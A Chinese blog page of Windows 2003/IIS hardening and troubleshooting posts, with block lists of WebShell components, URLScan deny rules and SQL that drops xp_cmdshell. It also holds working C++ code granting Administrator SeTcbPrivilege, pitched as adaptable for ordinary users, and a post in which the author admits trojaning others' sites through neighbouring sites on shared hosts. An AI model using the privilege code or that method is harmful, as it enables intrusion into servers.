　　4、可写目录执行权限设置：关闭所有可写目录的执行权限。由于程序方面的漏洞，目前非常流行上传一些网页木马，绝大部分都是用web进行上传的。由于不可写的目录木马不能进行上传，如果关闭了可写目录的执行权限，那么上传的木马将不能正常运行。可以有效防止这类形式web入侵。

　　5、处理运行错误：这里有两种方法，一是关闭错误回显。IIS属性――主目录――配置――应用程序调试――脚本错误消息，选择发送文本错误信息给客户。二是定制错误页面。在IIS属性――自定义错误信息，在http错误信息中双击需要定制的错误页面，将弹出错误映射属性设置框。消息类型有默认值、URL和文件三种，可以根据情况自行定制。这样一方面可以隐藏一些错误信息，另外一方面也可以使错误显示更加友好。

　　四、配置FTP

　　Ftp是绝大部分虚拟主机提供商必备的一项服务。用户的站内文件大部分都是使用ftp进行上传的。目前使用的最多的ftp服务器非Serv-U莫属了。这里有几点需要说明一下。

　　1、管理员密码必须更改

　　如果入侵爱好者们肯定对Serv-U提权再熟悉莫过了。这些提权工具使用的就是Serv-U默认的管理员的帐号和密码运行的。因为Serv-U管理员是以超级管理员的身份运行的。如果没有更改管理员密码，这些工具使用起来就再好用不过了。如果更改了密码，那这些工具要想正常运行，那就没那么简单喽。得先破解管理员密码才行。

　　2、更改安装目录权限

　　Serv-U的默认安装目录都是everyone可以浏览甚至可以修改的。安装的时候如果选择将用户信息存储在ini文件中，则可以在ServUDaemon.ini得到用户的所有信息。如果Guests有修改权限，那么黑客就可以顺利建立具有超级权限的用户。这可不是一件好事。所以在安装好Serv-U之后，得修改相应的文件夹权限，可以取消Guests用户的相应权限。

查看(11) 评论(0) 收藏分享管理

SideBySide (SxS) 错误 (事件ID: 32;事件ID: 59)

2008-05-06 02:28:43

Microsoft.VC80.MFCLOC 失败问题 SideBySide (SxS) 错误 (事件ID: 32;事件ID: 59)

在XP的事件查看器中找到以下错误：

事件ID: 32
找不到附属汇编 Microsoft.VC80.MFCLOC，上一个错误是参照的汇编没有安装在系统上。

事件ID: 59
Generate Activation Context 为 C:\WINDOWS\WinSxS\x86_Microsoft.VC80.MFC_1fc8b3b9a1e18e3b_8.0.50727.762_x-ww_39049d00\MFC80U.DLL 失败。参考错误消息: 操作成功完成。

事件ID: 59
Resolve Partial Assembly 为 Microsoft.VC80.MFCLOC 失败。参考错误消息: 参照的汇编没有安装在系统上。

上网查了一下，发现和 VC8.0 的运行库有关，下载了一个 vcredist_x86 安装包安装后问题解决。

下载地址是： http://www.microsoft.com/downloads/details.aspx?familyid=200B2FD9-AE1A-4A14-984D-389C36F85647&displaylang=zh-cn

查看(50) 评论(0) 收藏分享管理

win2003的安全设置

2008-05-06 00:19:25

原理篇
我们将从入侵者入侵的各个环节来作出对应措施
一步步的加固windows系统.
加固windows系统.一共归于几个方面
1.端口限制
2.设置ACL权限
3.关闭服务或组件
4.包过滤
5.审计
我们现在开始从入侵者的第一步开始.对应的开始加固已有的windows系统.
1.扫描
这是入侵者在刚开始要做的第一步.比如搜索有漏洞的服务.
对应措施:端口限制
以下所有规则.都需要选择镜像,否则会导致无法连接
我们需要作的就是打开服务所需要的端口.而将其他的端口一律屏蔽
2.下载信息
这里主要是通过URL SCAN.来过滤一些非法请求
对应措施:过滤相应包
我们通过安全URL SCAN并且设置urlscan.ini中的DenyExtensions字段
来阻止特定结尾的文件的执行

3.上传文件
入侵者通过这步上传WEBSHELL,提权软件,运行cmd指令等等.
对应措施:取消相应服务和功能,设置ACL权限
如果有条件可以不使用FSO的.
通过 regsvr32 /u c:\windows\system32\scrrun.dll来注销掉相关的DLL.
如果需要使用.
那就为每个站点建立一个user用户
对每个站点相应的目录.只给这个用户读,写,执行权限,给administrators全部权限
安装杀毒软件.实时杀除上传上来的恶意代码.
个人推荐MCAFEE或者卡巴斯基
如果使用MCAFEE.对WINDOWS目录所有添加与修改文件的行为进行阻止.
4.WebShell
入侵者上传文件后.需要利用WebShell来执行可执行程序.或者利用WebShell进行更加方便的文件操作.
对应措施:取消相应服务和功能
一般WebShell用到以下组件
WScript.Network
WScript.Network.1
WScript.Shell
WScript.Shell.1
Shell.Application
Shell.Application.1
我们在注册表中将以上键值改名或删除
同时需要注意按照这些键值下的CLSID键的内容137096 c279
从/HKEY_CLASSES_ROOT/CLSID下面对应的键值删除
5.执行SHELL
入侵者获得shell来执行更多指令
对应措施:设置ACL权限
windows的命令行控制台位于\WINDOWS\SYSTEM32\CMD.EXE
我们将此文件的ACL修改为
某个特定管理员帐户(比如administrator)拥有全部权限.
其他用户.包括system用户,administrators组等等.一律无权限访问此文件.
6.利用已有用户或添加用户
入侵者通过利用修改已有用户或者添加windows正式用户.向获取管理员权限迈进
对应措施:设置ACL权限.修改用户
将除管理员外所有用户的终端访问权限去掉.
限制CMD.EXE的访问权限.
限制SQL SERVER内的XP_CMDSHELL
7.登陆图形终端
入侵者登陆TERMINAL SERVER或者RADMIN等等图形终端,
获取许多图形程序的运行权限.由于WINDOWS系统下绝大部分应用程序都是GUI的.
所以这步是每个入侵WINDOWS的入侵者都希望获得的
对应措施:端口限制
入侵者可能利用3389或者其他的木马之类的获取对于图形界面的访问.
我们在第一步的端口限制中.对所有从内到外的访问一律屏蔽也就是为了防止反弹木马.
所以在端口限制中.由本地访问外部网络的端口越少越好.
如果不是作为MAIL SERVER.可以不用加任何由内向外的端口.
阻断所有的反弹木马.
8.擦除脚印
入侵者在获得了一台机器的完全管理员权限后
就是擦除脚印来隐藏自身.
对应措施:审计
首先我们要确定在windows日志中打开足够的审计项目.
如果审计项目不足.入侵者甚至都无需去删除windows事件.
其次我们可以用自己的cmd.exe以及net.exe来替换系统自带的.
将运行的指令保存下来.了解入侵者的行动.
对于windows日志
我们可以通过将日志发送到远程日志服务器的方式来保证记录的完整性.
evtsys工具([url=https://engineering.purdue.edu/ECN/Resources/Documents]https://engineering.purdue.edu/ECN/Resources/Documents[/url])
提供将windows日志转换成syslog格式并且发送到远程服务器上的功能.
使用此用具.并且在远程服务器上开放syslogd,如果远程服务器是windows系统.
推荐使用kiwi syslog deamon.
我们要达到的目的就是
不让入侵者扫描到主机弱点
即使扫描到了也不能上传文件
即使上传文件了不能操作其他目录的文件
即使操作了其他目录的文件也不能执行shell
即使执行了shell也不能添加用户
即使添加用户了也不能登陆图形终端
即使登陆了图形终端.拥有系统控制权.他的所作所为还是会被记录下来.
额外措施:
我们可以通过增加一些设备和措施来进一步加强系统安全性.
1.代理型防火墙.如ISA2004
代理型防火墙可以对进出的包进行内容过滤.
设置对HTTP REQUEST内的request string或者form内容进行过滤
将SELECT.DROP.DELETE.INSERT等都过滤掉.
因为这些关键词在客户提交的表单或者内容中是不可能出现的.
过滤了以后可以说从根本杜绝了SQL 注入
2.用SNORT建立IDS
用另一台服务器建立个SNORT.
对于所有进出服务器的包都进行分析和记录
特别是FTP上传的指令以及HTTP对ASP文件的请求
可以特别关注一下.
本文提到的部分软件在提供下载的RAR中包含
包括COM命令行执行记录
URLSCAN 2.5以及配置好的配置文件
IPSEC导出的端口规则
evtsys
一些注册表加固的注册表项.
实践篇
下面我用的例子.将是一台标准的虚拟主机.
系统:windows2003
服务:[IIS] [SERV-U] [IMAIL] [SQL SERVER 2000] [PHP] [MYSQL]
描述:为了演示,绑定了最多的服务.大家可以根据实际情况做筛减
1.WINDOWS本地安全策略 端口限制
A.对于我们的例子来说.需要开通以下端口
外->本地 80
外->本地 20
外->本地 21
外->本地 PASV所用到的一些端口
外->本地 25
外->本地 110
外->本地 3389
然后按照具体情况.打开SQL SERVER和MYSQL的端口
外->本地 1433
外->本地 3306
B.接着是开放从内部往外需要开放的端口
按照实际情况,如果无需邮件服务,则不要打开以下两条规则
本地->外 53 TCP,UDP
本地->外 25
按照具体情况.如果无需在服务器上访问网页.尽量不要开以下端口
本地->外 80
C.除了明确允许的一律阻止.这个是安全规则的关键.
外->本地 所有协议 阻止
2.用户帐号
a.将administrator改名,例子中改为root
b.取消所有除管理员root外所有用户属性中的 
远程控制->启用远程控制 以及
终端服务配置文件->允许登陆到终端服务器
c.将guest改名为administrator并且修改密码
d.除了管理员root,IUSER以及IWAM以及ASPNET用户外.禁用其他一切用户.包括SQL DEBUG以及TERMINAL USER等等
3.目录权限
将所有盘符的权限,全部改为只有
administrators组  全部权限
system  全部权限
将C盘的所有子目录和子文件继承C盘的administrator(组或用户)和SYSTEM所有权限的两个权限
然后做如下修改
C:\Program Files\Common Files 开放Everyone　默认的读取及运行 列出文件目录 读取三个权限
C:\WINDOWS\ 开放Everyone　默认的读取及运行 列出文件目录 读取三个权限
C:\WINDOWS\Temp 开放Everyone 修改,读取及运行,列出文件目录,读取,写入权限
现在WebShell就无法在系统目录内写入文件了.
当然也可以使用更严格的权限.
在WINDOWS下分别目录设置权限.
可是比较复杂.效果也并不明显.
4.IIS
在IIS 6下.应用程序扩展内的文件类型对应ISAPI的类型已经去掉了IDQ,PRINT等等危险的脚本类型,
在IIS 5下我们需要把除了ASP以及ASA以外所有类型删除.
安装URLSCAN
在[DenyExtensions]中
一般加入以下内容
.cer
.cdx
.mdb
.bat
.cmd
.com
.htw   
.ida   
.idq   
.htr   
.idc   
.shtm 
.shtml 
.stm   
.printer 
这样入侵者就无法下载.mdb数据库.这种方法比外面一些在文件头加入特殊字符的方法更加彻底.
因为即便文件头加入特殊字符.还是可以通过编码构造出来的
5.WEB目录权限
作为虚拟主机.会有许多独立客户
比较保险的做法就是为每个客户,建立一个windows用户
然后在IIS的响应的站点项内
把IIS执行的匿名用户.绑定成这个用户
并且把他指向的目录
权限变更为
administrators  全部权限
system  全部权限
单独建立的用户  读写执行
如果服务器上站点不多.并且有论坛
我们可以把每个论坛的上传目录
去掉此用户的执行权限.
只有读写权限
这样入侵者即便绕过论坛文件类型检测上传了webshell
也是无法运行的.
6.MS SQL SERVER2000
使用系统帐户登陆查询分析器
运行以下脚本
use master 
exec sp_dropextendedproc 'xp_cmdshell' 
exec sp_dropextendedproc 'xp_dirtree'
exec sp_dropextendedproc 'xp_enumgroups'
exec sp_dropextendedproc 'xp_fixeddrives'
exec sp_dropextendedproc 'xp_loginconfig'
exec sp_dropextendedproc 'xp_enumerrorlogs'
exec sp_dropextendedproc 'xp_getfiledetails'
exec sp_dropextendedproc 'Sp_OACreate' 
exec sp_dropextendedproc 'Sp_OADestroy' 
exec sp_dropextendedproc 'Sp_OAGetErrorInfo' 
exec sp_dropextendedproc 'Sp_OAGetProperty' 
exec sp_dropextendedproc 'Sp_OAMethod' 
exec sp_dropextendedproc 'Sp_OASetProperty' 
exec sp_dropextendedproc 'Sp_OAStop' 
exec sp_dropextendedproc 'Xp_regaddmultistring' 
exec sp_dropextendedproc 'Xp_regdeletekey' 
exec sp_dropextendedproc 'Xp_regdeletevalue' 
exec sp_dropextendedproc 'Xp_regenumvalues' 
exec sp_dropextendedproc 'Xp_regread' 
exec sp_dropextendedproc 'Xp_regremovemultistring' 
exec sp_dropextendedproc 'Xp_regwrite' 
drop procedure sp_makewebtask
go
删除所有危险的扩展.
sp_addextendedproc xp_fixeddrives,@dllname='xplog70.dll'
execute sp_fulltext_database 'enable'
7.修改CMD.EXE以及NET.EXE权限
将两个文件的权限.修改到特定管理员才能访问,比如本例中.我们如下修改
cmd.exe   root用户   所有权限
net.exe   root用户   所有权现
这样就能防止非法访问.
还可以使用例子中提供的comlog程序
将com.exe改名_com.exe,然后替换com文件.这样可以记录所有执行的命令行指令
8.备份
使用ntbackup软件.备份系统状态.
使用reg.exe 备份系统关键数据
如reg export HKLM\SOFTWARE\ODBC e:\backup\system\odbc.reg /y
来备份系统的ODBC
9.杀毒
这里介绍MCAFEE 8i 中文企业版
因为这个版本对于国内的许多恶意代码和木马都能够及时的更新.
比如已经能够检测到海阳顶端2006
而且能够杀除IMAIL等SMTP软件使用的队列中MIME编码的病毒文件
而很多人喜欢安装诺顿企业版.而诺顿企业版,对于WEBSHELL.基本都是没有反应的.
而且无法对于MIME编码的文件进行杀毒.
在MCAFEE中.
我们还能够加入规则.阻止在windows目录建立和修改EXE.DLL文件等
我们在软件中加入对WEB目录的杀毒计划.
每天执行一次
并且打开实时监控.
10.关闭无用的服务
我们一般关闭如下服务
Computer Browser
Help and Support
Messenger
Print Spooler
Remote Registry
TCP/IP NetBIOS Helper
如果服务器不用作域控,我们也可以禁用
Workstation
11.取消危险组件
如果服务器不需要FSO
regsvr32 /u c:\windows\system32\scrrun.dll
注销组件
使用regedit
将/HKEY_CLASSES_ROOT下的
WScript.Network
WScript.Network.1
WScript.Shell
WScript.Shell.1
Shell.Application
Shell.Application.1
键值改名或删除
将这些键值下CLSID中包含的字串
如{72C24DD5-D70A-438B-8A42-98424B88AFB8}
到/HKEY_CLASSES_ROOT/CLSID下找到以这些字串命名的键值
全部删除
12.审计
本地安全策略->本地策略->审核策略
打开以下内容
审核策略更改 成功,失败
审核系统事件 成功,失败
审核帐户登陆事件 成功,失败
审核帐户管理 成功,失败

运行regedit，找到[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ Wds \ rdpwd \ Tds \ tcp]，
看到右边的PortNumber了吗？在十进制状态下改成你想要的端口号吧，比如7126之类的，只要不与其它冲突即可。
第二处HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp，
方法同上，记得改的端口号和上面改的一样就行了。

查看(13) 评论(0) 收藏分享管理

Windows权限

2008-05-05 01:21:40

如何超越Windows2000赋予的ADMINISTRATOR权限！虽然Admin权利大，但不是最大

NT的安全组件里有一个叫Local Security Authority Protected Subsystem.当我们以ADMIN
ISTRATOR登陆时,系统根据缺省的授权,赋予ADMINISTRATOR16个授权.下面乃是详细的清单.
SeChangeNotifyPrivilege
SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeSystemtimePrivilege
SeShutdownPrivilege
SeRemoteShutdownPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeLoadDriverPrivilege
SeCreatePagefilePrivilege
SeIncreaseQuotaPrivilege
其中 SeChangeNotifyPrivilege是缺省打开的.其他则需要调整TOKEN来打开.拥有了这么多的
权限后,ADMIN真可谓强大,没有任何其他用户拥有这么多的权限了.但是,仍然有几个更有威力
的权限没有赋予ADMIN.那就是SeTcbPrivilege和SeCreateTokenPrivilege. SeTcbPrivilege
表示当前用户的操作代表了系统的操作,SeCreateTokenPrivilege更可赤裸裸地为任意令牌创
建权限.乃是无上的特权.如果任何人拥有了这两个权限,在NT世界的权利就太夸张了.所以,N
T根本就不给任何用户以这两个权限.
出于对权利的渴望,通常病毒,HACKER都会想法获取最高权限.现在,由于NT的保护,直接地获取
这2个权限是不行了.那么就需要饶个弯子了.
由于没有直接的API可以增加TOKEN的特权,我们只好通过LSA POLICY库调整用户权限.因为用
户权限在LSA POLICY库里被提取出来.当LSA POLICY库里增加了一个特权,用户可以在下一个
进程里打开该特权.HEHE... ADMIN组对LSA POLICY库有写权.:DDD ADMIN没有超级特权,LSA对
用户的特权从POLICY库里提取... 真是个可爱的连环套啊. :)
下面是我写的程序,打开ADMINISTRATOR的SeTcbPrivilege特权.尽管我在程序里面设置了ADM
IN检查,但是通过少量的改写就可以时普通用户获取一些超级权限.:)里面的小技巧大家自己
通常可以动出脑筋的.当然并不是通过删除ADMINISTRATOR检验就可以完成的. :)
当然,这里有编译好的版本供下载.
/*++
sec.cpp

#define UNICODE
#include <windows.h>
#include <iostream.h>
#include <stdio.h>
#include <ntsecapi.h>

//
//Global vars
//
LSA_HANDLE PolicyHandle;
PSID Sid=0;
DWORD cbSid=0;
LPTSTR ReferencedDomainName=0;
DWORD cbReferencedDomainName=0;
SID_NAME_USE peUse;
PUNICODE_STRING UserRights=0; //UnicodeString Pointer to PRIVILEGE
ULONG Count=0; //
WCHAR textSid[200];
HANDLE token=0;
PTOKEN_PRIVILEGES TokenInformation=0;
BOOL owned=0;

//
//quit
//
void quit(int err){
if (Sid) delete Sid;
if (ReferencedDomainName) delete ReferencedDomainName;
if (UserRights) delete UserRights;
if (TokenInformation) delete TokenInformation;
if (token) CloseHandle(token);
if (PolicyHandle) LsaClose(PolicyHandle);

wprintf(L"\n\nWritten by Lu Lin. 2000.1.30\nLicence: Freeware.\n");

if (err){
exit(0xc0000000);
}
else {
exit(0);
}
}

void printprivilege(LUID_AND_ATTRIBUTES* luid){
WCHAR dispname[100];
ULONG cb=100;

if (!LookupPrivilegeName(
0,
&(luid->Luid),
dispname,
&cb)){
wprintf(L"I can't translate SOME LUID to privilege!\n");
exit(1);
}

wprintf(L"\tPrivilege: %s\n",dispname);

if (!_wcsicmp(dispname,L"SeTcbPrivilege")) owned=1;

switch (luid->Attributes){
case SE_PRIVILEGE_ENABLED_BY_DEFAULT:
wprintf(L"\t\tThis privilege is enabled by default\n");
break;
case SE_PRIVILEGE_ENABLED:
wprintf(L"\t\tThis privilege is enabled.\n");
break;
case SE_PRIVILEGE_USED_FOR_ACCESS:
wprintf(L"\t\tThis privilege is used for access.\n");
break;
case 3:
wprintf(L"\t\tThis privilege is always on for you.\n");
break;
case 0:
wprintf(L"\t\tThis privilege you owned has not been enabled yet.\n");
}
}

void init(){
WCHAR username[30];
ULONG cb;
OSVERSIONINFO osv;

//if nt?
ZeroMemory(&osv,sizeof(osv));
osv.dwOSVersionInfoSize=sizeof(osv);
GetVersionEx(&osv);
if (!osv.dwPlatformId&VER_PLATFORM_WIN32_NT){
wprintf(L"This program only runs on NT");
quit(1);
}

//
//Check if this thread is executed inside administrator's context.
//
cb=30;
GetUserName(username,&cb);
if (_wcsicmp(username,L"administrator")){
wprintf(L"Logon as administrator first!\n");
quit(1);
}

wprintf(L"WINDOWS NT %i.%i Build %i %s\n\n",
osv.dwMajorVersion,
osv.dwMinorVersion,
osv.dwBuildNumber,
osv.szCSDVersion);
}

BOOL GetTextualSid(
PSID pSid, // binary Sid
LPTSTR TextualSid, // buffer for Textual representation of Sid
DWORD dwBufferLen // required/provided TextualSid buffersize
)
{
PSID_IDENTIFIER_AUTHORITY psia;
DWORD dwSubAuthorities;
DWORD dwSidRev=SID_REVISION;
DWORD dwCounter;
DWORD dwSidSize;

// Validate the binary SID.

if(!IsValidSid(pSid)) return FALSE;

// Get the identifier authority value from the SID.

psia = GetSidIdentifierAuthority(pSid);

// Get the number of subauthorities in the SID.

dwSubAuthorities = *GetSidSubAuthorityCount(pSid);

// Compute the buffer length.
// S-SID_REVISION- + IdentifierAuthority- + subauthorities- + NULL

dwSidSize=(15 + 12 + (12 * dwSubAuthorities) + 1) * sizeof(TCHAR);

// Check input buffer length.
// If too small, indicate the proper size and set last error.

if (dwBufferLen < dwSidSize)
{
SetLastError(ERROR_INSUFFICIENT_BUFFER);
return FALSE;
}

// Add 'S' prefix and revision number to the string.

dwSidSize=wsprintf(TextualSid, TEXT("S-%lu-"), dwSidRev );

// Add SID identifier authority to the string.

if ( (psia->Value[0] != 0) || (psia->Value[1] != 0) )
{
dwSidSize+=wsprintf(TextualSid + lstrlen(TextualSid),
TEXT("0x%02hx%02hx%02hx%02hx%02hx%02hx"),
(USHORT)psia->Value[0],
(USHORT)psia->Value[1],
(USHORT)psia->Value[2],
(USHORT)psia->Value[3],
(USHORT)psia->Value[4],
(USHORT)psia->Value[5]);
}
else
{
dwSidSize+=wsprintf(TextualSid + lstrlen(TextualSid),
TEXT("%lu"),
(ULONG)(psia->Value[5] ) +
(ULONG)(psia->Value[4] << 8) +
(ULONG)(psia->Value[3] << 16) +
(ULONG)(psia->Value[2] << 24) );
}

// Add SID subauthorities to the string.
//
for (dwCounter=0 ; dwCounter < dwSubAuthorities ; dwCounter++)
{
dwSidSize+=wsprintf(TextualSid + dwSidSize, TEXT("-%lu"),
*GetSidSubAuthority(pSid, dwCounter) );
}

return TRUE;
}

void main(){
LSA_OBJECT_ATTRIBUTES ObjectAttributes;
ZeroMemory(&ObjectAttributes,sizeof(ObjectAttributes));

init();
//
//First open LSA policy database
//the call returns a NTSTATUS. NTSTATUS 0 means everything is OK.
//
if (LsaOpenPolicy(
0,
&ObjectAttributes,
GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE,
&PolicyHandle
)){
wprintf(L"Open Policy error!\n");
}
else {
Sid=new char[500];
ReferencedDomainName=new WCHAR[100];
cbSid=500;
cbReferencedDomainName=100;

//
//Show Administrator SID
//
if (!LookupAccountName(
0,
L"Administrator",
Sid,
&cbSid,
ReferencedDomainName,
&cbReferencedDomainName,
&peUse
)){
wprintf(L"Damn, I can't find out the account looking for!\n");
quit(1);
}
if (!GetTextualSid(Sid,textSid,200)){
wprintf(L"Damn, Get textual SID error! Maybe a bug in this program.\n");
quit(1);
}

wprintf(L"The SID of administrator is: %s \n",textSid);
wprintf(L"\tOn the server: %s\n",ReferencedDomainName);

//
//Check current privilege
//
if (!OpenProcessToken(
GetCurrentProcess(),
TOKEN_QUERY,
&token)){
wprintf(L"Can't open process token! What's happened?\n");
quit(1);
}

TokenInformation=(PTOKEN_PRIVILEGES)(new char[2000]);

if (!GetTokenInformation(
token,
TokenPrivileges,
(void*)TokenInformation,
2000,
&cbSid //Note, Returned lenght of token information.
)){
wprintf(L"Can't get token information\n");
quit(1);
}
else{
LUID_AND_ATTRIBUTES *luid;
luid=(LUID_AND_ATTRIBUTES *)&TokenInformation->Privileges;

wprintf(L"\nTotal privilege count: %i\n\n",TokenInformation->PrivilegeCount);
for (Count=0;Count<TokenInformation->PrivilegeCount;
Count++,luid++){
printprivilege(luid);
}
}

//
//Add SeTchPrivilege to Administrator if not owned yet!
//
if (!owned){
UserRights=new LSA_UNICODE_STRING;
UserRights->Buffer=L"SeTcbPrivilege";
UserRights->MaximumLength=28;
UserRights->Length=28;

if (LsaAddAccountRights(
PolicyHandle,
Sid,
UserRights,
1
)){
wprintf(L"Damn! Add right failed! :(\n");
quit(1);
}
else wprintf(L"\nAdd SeTcbPrivilege successfully!\n");

quit(0);
}
else {
wprintf(L"\nYou own SeTcbPrivilege. I don't add it for you.\n");
}
}
}

查看(10) 评论(0) 收藏分享管理
应用程序-特定权限设置未将COM 服务器应用程序

2008-05-05 00:55:28

应用程序-特定权限设置未将COM 服务器应用程序

在事件查看器中，可以看到：

应用程序-特定权限设置未将COM 服务器应用程序(CLSID 为
{A9E69610-B80D-11D0-B9B9-00A0C922E750}
)的本地激活权限授予用户 IBM-D882681D063\IWAM_IBM-D882681D063 SID (S-1-5-21-1304240173-3011969147-3728014682-1013)。可以使用组件服务管理工具修改此安全权限。

有关更多信息，请参阅在 http://go.microsoft.com/fwlink/events.asp" ... soft.com/fwlink/events.asp 的帮助和支持

最后又查阅了大量的英文资料，采用如下的方法：
点击“开始”-“控制面板”-“管理工具”-“组件服务”-“计算机”-“我的电脑”-“DCOM”选项，
选择其下的“IIS ADMIN SERVICE”，右健选择“属性”，找到“安全”，在“启动和激活权限”中编辑“自定义”，添加帐号“IWAM_*****”，
给该帐号赋予“本地启动”和“本地激活”的权限，重新启动IIS，（点“开始”-“运行”-“CMD”，点确定，然后运行IISRESET），
运行HTTP：//LOCALHOST，一切OK。

最近几天一直为事件查看器中事件ID:10016的问题所困惑.

描述为:
计算机-默认权限设置未将 COM 服务器应用程序(CLSID 为
{0C0A3666-30C9-11D0-8F20-00805F2CD064}
)的本地激活权限授予用户 NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20)。可以使用组件服务管理工具修改此安全权限。
有关更多信息，请参阅在 http://go.microsoft.com/fwlink/events.asp 的帮助和支持中心。

这个错误是在用http://localhost(http://localhost/) 登录自己的www服务时产生的:
启动IIS/www服务,在IE窗口一输入http://localhost(http://localhost/) 并回车,就会出现这个错误。当然这不影响浏览。
重启IIS/www服务,并打开一个新窗口（在原窗口不会发生错误），还用http://localhost(http://localhost/) ,同样的错误还会发生。

尝试一
按照错误提示，在管理工具打开组件服务（或运行dcomcnfg.exe），DCOM配置/Machine Debug Manager/安全/启动和激活权限，添加Network Service的激活权限，无效。
而在网上看到，win2003 sp1会出现{BA126AD1-2166-11D1-B1D0-00805FC1270E}的DCOM的同样错误，那里的解决方法也是这样的方法：只不过是对netman而不是Machine Debug Manager。
但是现在这样做怎么无效呢？

尝试二
继续寻找方法：
http://www.eventid.net/display.a...ce=DCOM&phase=1
提供的方法是，将Machine Debug Manager/安全/启动和激活权限　设为默认即可。
多次试了这个方法，仍然无效。

怎么办？

于是尝试三：regedit, HKEY_CLASSES_ROOT\CLSID\{0C0A3666-30C9-11D0-8F20-00805F2CD064}
添加Network Service的权限（当然我也认为这是错误的方法），无效，于是将Network Service仍然去掉。

重新用尝试二，这次不再有错误提示了。

可以肯定第一次用尝试二时，步骤并没有错误。问题虽然解决,但不解得很。

经过检查,可以肯定:
1.这种DCOM错误的确是在win2003打了sp1之后出现的,在这之前并没有这种错误出现;
2.第一次用尝试二时.Machine Debug Manager/安全的三个选项全是自定义;将它们设为默认后,不能使这种DCOM错误消失;而使用了尝试三再用尝试二,的确解决了问题.

查看(14) 评论(0) 收藏分享管理
看到一些网站被挂木马的说明

2008-05-02 01:30:30

别忽视了IDC服务器商的风险哦，我告诉你~对于黑客来说~为了挂你的站，常常不是使用对点方式的破解，而选择旁注入的方法，他们的方法就是破解与你同一个服务器上的其他网站，不要不信，别人要知道你网站的邻居有哪些轻松的很（进这个网站自己查查看同一ip下的所有网站，输入你的ip地址就可以了http://www.myipneighbors.com/），破解你同一服务器上的其他用户，让你挂马也是很轻松的了（我用这个方法就挂过别人的网站）。对于一些好的服务器尚对于这个限制的厉害，就不会出现这个问题。

还有就是你开启的用户上传这一栏最好严格控制一下，这个也比较关键，如果黑客不是破解你后台的话，挂你马也就难多了，因为他们需要上传一个挂马工具上来，如果你已经被挂马了，切记要检查下你的网站是不是允许上传html.php.asp等文件了。

不可抗拒的自然因素，比如一个超级顶级黑客要挂你的网站，我怕很多没有毛病的东西都会有毛病了，相信我一句话，挂马的黑客都是一些菜鸟黑客和工具黑客，做好以上，那些黑客就不知道怎么做了。

查看(11) 评论(0) 收藏分享管理
[论坛] bt西游记漫画连载

2007-04-18 16:08:46

97647c.jpg

查看(25) 评论(6) 收藏分享管理
[论坛] 芙蓉姐姐秀乳沟 "整容"后新形象大跌眼镜(组图)

2007-04-18 03:03:47

谁说芙蓉姐姐没有外表、只有土气造型？谁说芙蓉姐姐不可以拥有美丽？4月15日，一向自信敢秀、拥有招牌式“S”造型的网络红人芙蓉姐姐，联手专业造型师岳华和摄影师胡昊进行了一场前所未有的革命性造型“整容”，大波浪、烟熏装，全新的蜕变让自己都认为有些土气的形象瞬间升级，令众人大跌眼镜。时尚的元素，动感的妆容加上原本就抵挡不住极具妖媚气质的芙蓉姐姐，在造型变化后敢秀的她还是不忘大摆自己的“S”型的招牌动作，挺起自己的傲人胸部向“黄金甲”宣战。就她自己的话说，要完美的展示自己，做走向国际的明星，造型怎可不注意？
挑战“黄金甲”大秀乳沟
　　自出道以来，芙蓉姐姐一直以其超强的自信闻名，身材的丰满圆润一度成为芙蓉姐姐自己满意、敢秀的“力量源泉”。然而自信不一定就可以拥有所有人赞美的眼光，不少人对于芙蓉姐姐的造型都觉得过于千篇一律，稍显土气。当听说此次要从造型上大变身，芙蓉姐姐到底可以变成什么样子？美不美？一时之间所有人都充满了好奇。当天，笔者随同芙蓉姐姐一起进入造型间，进行全面改造，但一向自信的她，虽然要从造型上大变身，但对于自己“S”型的身材芙蓉姐姐依旧本着“身材完美，唯我独尊”的信念，以一身低胸红色的性感裙装亮相，呼之欲出的胸部，加上衣服紧身的设计令她的身材赤裸裸的暴露出来，就她自己的话说，“我这可是货真价实，不像黄金甲里是硬挤出来。”自信之余还不忘与造型师一度调侃，令经历了为多位名人造型的岳华都有些面泛红脸。

为美受尽“折磨” 欲做世界级明星
　　如今，芙蓉姐姐在娱乐圈里的名气可谓是与日俱增，唱歌、出书、主持，出席各个商业活动，她的妖媚身影随处可见。作为众人瞩目的对象，芙蓉姐姐对于自己的造型可谓是相当注意，本着自信态度的她，无论从服装还是妆容上都是亲历亲为，但自信并不代表就可以完美呈现。可能也是认识到了这一点，芙蓉这次突然把自己交给了造型师，先后以四种造型出现，尝试重色彩，新发型，让自己也可以拥有别样风格的美丽。
　　所谓拥有美丽就要付出代价，一向珍爱自己头发的芙蓉姐姐为了当天呈现新的发型，不得不声声叹惜造型师对自己头发的“折磨”，再加上可能由于自己的身材太过“完美”，原本准备的服装一时间在芙蓉姐姐身上也形成了“紧箍咒”，令她大气不敢出地坚持了数小时。
　　功夫不负有心人，一直都是以直发、淡妆亮相的芙蓉姐姐被造型师岳华运用大波浪，彩妆、烟熏妆进行了全新改变、整体更张扬更活泼，从风格淳朴走向性感时尚。爱美敢秀的芙蓉姐姐在拥有美丽妆容之后更是不忘拿出自己的招牌动作，令摄影师也是极为惊叹。
　　对于现如今的改变芙蓉姐姐表示相当满意，但一向自信的她在承认美丽的同时依旧给自己和造型师来了个高要求，“比我以前的妆，照片是好了很多，但还是没有完全把我最美的地方展现出来，比如说眉毛，嘴唇这些我很美地方，还需要在之后与造型师经常沟通达到共识了才能更好的表现。”有了区别于以往的变化，芙蓉姐姐也开始有了拥有自己造型师的想法，“以后肯定也要有自己的造型师，如果变成世界级明星的必须得有啊，”

Img249469842.jpg

Img249469843.jpg

Img249469844.jpg

Img249469845.jpg

Img249469846.jpg

Img249469847.jpg

Img249469848.jpg

Img249469849.jpg

查看(133) 评论(8) 收藏分享管理
[论坛] 翡翠是如何形成的？

2007-04-04 01:14:46

